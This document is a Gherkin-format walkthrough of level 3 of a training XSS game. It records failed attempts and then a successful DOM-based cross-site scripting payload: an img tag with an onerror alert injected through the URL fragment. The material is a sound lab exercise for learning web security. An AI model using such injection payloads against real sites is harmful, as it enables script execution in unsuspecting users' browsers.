## Version 1.0
## language: en

Feature: Cross-site scripting
  Site:
    Xss-game
  Category:
    Cross-site scripting
  User:
    kzccardona
  Goal:
    Interact with the vulnerable application to execute an alert
    using the URL https://xss-game.appspot.com/level3/frame#1

  Background:
  Hacker's software:
    |  <Software name>  |    <version>   |
    | Microsoft Windows | 10.0.17763.437 |
    | Google Chrome     | 75.0  (64 bit) |
  Machine information:

  Scenario: Fail: Directly write "<script>" tag
    Given I wrote at the end of the URL javascript code:
    """
        https://xss-game.appspot.com/level3/frame#
        <script>
              alert('Success')
        </script>
    """
    When I hit the enter key the page reload
    And the page didn't show my alert
    Then I can't get the flag

  Scenario: Fail: Use element inspector tool
    Given I search in web about diferent types of XSS
    When find some information and clues to try other attacks
    And I try to inspect the code of the page
    Then I find the javascript function that load the images
    """
    function chooseTab(num) {
        // Dynamically load the appropriate image.
        var html = "Image " + parseInt(num) + "<br>";
        html += "<img src='/static/level3/cloud" + num + ".jpg' />";
        $('#tabContent').html(html);

        window.location.hash = num;}
    """
    And I try to asign a value to the var "html" using the console
    """
    html = <script>
              alert('Success')
           </script>
    """
    And I hit the enter key
    Then the console give me an error
    And I can't get the flag

  Scenario: Success: Using onerror event attribute
    Given I try with a "<img>" tag with onerror attribute
    And I wrote in the URL the tag
    """
        https://xss-game.appspot.com/level3/frame#
        <img src='something' onerror=alert(window.location)>
    """
    When I hit the enter key the page reload
    Then it works and show my alert
    Then the page give me the flag
    """
    Congratulations, you executed an alert:

        https://xss-game.appspot.com/level3/frame#%3Cimg%20src=
        'something'%20onerror=alert(window.location)%3E

    You can now advance to the next level.
    """
